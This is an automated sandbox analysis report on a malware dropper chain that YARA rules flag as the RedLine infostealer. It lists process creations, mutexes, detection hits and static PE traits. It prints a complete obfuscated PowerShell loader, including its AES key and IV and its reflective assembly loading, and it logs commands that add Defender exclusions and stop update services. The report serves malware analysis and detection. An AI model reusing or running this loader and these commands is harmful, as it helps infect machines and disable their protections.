Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: String function: 0040B230 appears 43 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4628 -ip 4628

Source: Mc3FDUMnVz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2354
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2354
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2354	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2354

Source: amsi32_5080.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 61.2.ViGgA8C.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 61.2.ViGgA8C.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 61.2.ViGgA8C.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000003D.00000003.79070089758.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000003D.00000002.79562208043.0000000000F22000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5080, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: Mc3FDUMnVz.exe	Static PE information: Section: shlcppqz ZLIB complexity 0.9942111841605951
Source: skotes.exe.0.dr	Static PE information: Section: shlcppqz ZLIB complexity 0.9942111841605951
Source: Ryu8yUx[1].exe.4.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: Ryu8yUx.exe.4.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: ViGgA8C[1].exe.4.dr	Static PE information: Section: ZLIB complexity 0.9959508384146342
Source: ViGgA8C[1].exe.4.dr	Static PE information: Section: ghsupnpm ZLIB complexity 0.9948160260157849
Source: ViGgA8C.exe.4.dr	Static PE information: Section: ZLIB complexity 0.9959508384146342
Source: ViGgA8C.exe.4.dr	Static PE information: Section: ghsupnpm ZLIB complexity 0.9948160260157849
Source: random[1].exe1.4.dr	Static PE information: Section: ZLIB complexity 1.0003621295592706
Source: random[1].exe1.4.dr	Static PE information: Section: qdrbyomc ZLIB complexity 0.9942703337145808
Source: 23a60cad74.exe.4.dr	Static PE information: Section: ZLIB complexity 1.0003621295592706
Source: 23a60cad74.exe.4.dr	Static PE information: Section: qdrbyomc ZLIB complexity 0.9942703337145808
Source: tmp7BA6.tmp.61.dr	Static PE information: Section: shlcppqz ZLIB complexity 0.9942111841605951

Source: random[1].exe.4.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 439c2c3c87.exe.4.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe1.4.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 23a60cad74.exe.4.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: Ryu8yUx[1].exe.4.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Ryu8yUx[1].exe.4.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Ryu8yUx.exe.4.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Ryu8yUx.exe.4.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.Ryu8yUx.exe.3b79550.0.raw.unpack, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.Ryu8yUx.exe.3b79550.0.raw.unpack, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'

Source: Ryu8yUx[1].exe.4.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: Ryu8yUx.exe.4.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 12.2.Ryu8yUx.exe.3b79550.0.raw.unpack, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@132/157@0/14

Source: C:\Windows\System32\dialer.exe

Code function: 47_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

47_2_000000014000226C

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

Code function: 13_2_0043E150 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

13_2_0043E150

Source: C:\Windows\System32\dialer.exe

47_2_000000014000226C

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3600:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1204:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4100:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2156:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4100:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:304:WilStaging_02
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4628
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_03

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"

Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Mc3FDUMnVz.exe	Virustotal: Detection: 63%
Source: Mc3FDUMnVz.exe	ReversingLabs: Detection: 57%

Source: Mc3FDUMnVz.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: powershell.exe	String found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: UN8QxIq.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: UN8QxIq.exe	String found in binary or memory: XOvaaGmI7rLmVloqGgjRxZnYLKEM0YxcbIH/HfCSWsyPzuh14I/adDWgs/Hcu/bknefiuM+Wmi1BlcHEy5qhQhkuzEGovw2mSdSj/uE+JTIYDaCzKbY5yMu6xVYtQmXvjmHNlby/Dbzhk37XAbHlwZl2l5q+9hyP5vFukMk+4n08y+SdrL/h5OOEzczjmOY5adGLqxm5lYjNerX7x32l0ZjZJvWDt2Wt5a2bDkiJCnyL9oCB1LaqJbWvGfjuTrv6nU7N
Source: powershell.exe	String found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: covxzxzipzly.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

File read: C:\Users\user\Desktop\Mc3FDUMnVz.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Mc3FDUMnVz.exe "C:\Users\user\Desktop\Mc3FDUMnVz.exe"
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process created: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4628 -ip 4628
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 920
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe "C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe"
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
